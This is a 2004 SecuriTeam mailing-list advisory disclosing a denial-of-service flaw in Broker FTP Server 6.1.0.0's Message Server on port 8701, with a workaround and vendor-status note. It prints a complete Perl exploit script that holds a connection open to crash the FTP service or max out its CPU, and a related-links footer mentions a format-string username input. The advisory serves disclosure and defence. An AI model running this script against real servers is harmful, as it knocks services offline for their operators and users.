[NT] Broker FTP DoS (Message Server)

From: SecuriTeam (support_at_securiteam.com)
Date: 02/11/04

  • Next message: SecuriTeam: "[NEWS] Mutt menu_pad_string() Buffer Overflow"
    To: list@securiteam.com
    Date: 11 Feb 2004 17:33:06 +0200
    
    

    The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
    - - promotion

    The SecuriTeam alerts list - Free, Accurate, Independent.

    Get your security news from a reliable source.
    http://www.securiteam.com/mailinglist.html

    - - - - - - - - -

      Broker FTP DoS (Message Server)
    ------------------------------------------------------------------------

    SUMMARY

    Beyond Security's SecurITeam has discovered two security vulnerabilities
    in the Broker FTP product, these vulnerabilities allow a remote attacker
    to repeatedly crash the TsFtpSrv.exe (The FTP Service) and to cause it to
    used large amount of CPU time.

    DETAILS

    Affected version:
     * Broker FTP Server version 6.1.0.0

    By connecting and immediately disconnecting to the Broker FTP server's
    Message Server (by default residing on port 8701) it is possible to cause
    an exception in the TsFtpSrv.exe program. The exception doesn't cause any
    harm beside showing a message that the TsFtpSrv.exe has encountered an
    Application Error.

    By connecting and not sending anything (but keeping the connection open),
    it is possible to cause the TsFtpSrv.exe to utilize large amount of CPU
    time (basically while the connection is kept open, CPU usage will be
    100%).

    Workaround:
    It is not clear what the Message Server is used for, but modifying the
    TsFtpSrv.ini's [TSMessageServer] allows an administrator to control what
    port the server listens on (and change it from the default one).

    Exploit:
    #!/usr/bin/perl -w
    # TransSoft Broker FTP Server DoS (CPU usage and Exception)
    #

    use Socket;
    if (not $ARGV[0]) {
            print qq~
                    Usage: pfdos.pl < host>
            ~;
    exit;}

    $ip=$ARGV[0];
    print "host: " . $ip . "\n\n";
    sendexplt("A");
    sub sendexplt {
     my ($pstr)=@_;
            $target= inet_aton($ip) || die("inet_aton
    problems");
     socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')
    ||0) ||
     die("Socket problems\n");
     if(connect(S,pack "SnA4x8",2,8701,$target)){
     select(S);
                    $|=1;
     print $pstr;
     sleep 100;
             close(S);
     } else { die("Can't connect...\n"); }
    }

    Vendor Status:
    We have informed the vendor over a month ago, to all the emails we could
    have found on its web site, we have not received any response, as of yet.

    ADDITIONAL INFORMATION

    The information has been provided by <mailto:expert@securiteam.com>
    SecurITeam.

    ========================================

    This bulletin is sent to members of the SecuriTeam mailing list.
    To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
    In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com

    ====================
    ====================

    DISCLAIMER:
    The information in this bulletin is provided "AS IS" without warranty of any kind.
    In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.


  • Next message: SecuriTeam: "[NEWS] Mutt menu_pad_string() Buffer Overflow"

    Relevant Pages

    • [NT] Format String Vulnerability in DreamFTP (User command)
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... Dream FTP Server provides powerful, ... When connecting to the FTP server and supplying %n%n%n for the username, ... In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages. ...
      (Securiteam)
    • [EXPL] wget SYST Unchecked Boundary Condition
      ... The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com ... A vulnerability in wget's SYST implementation allows a remote attacker to ... my $child; ...
      (Securiteam)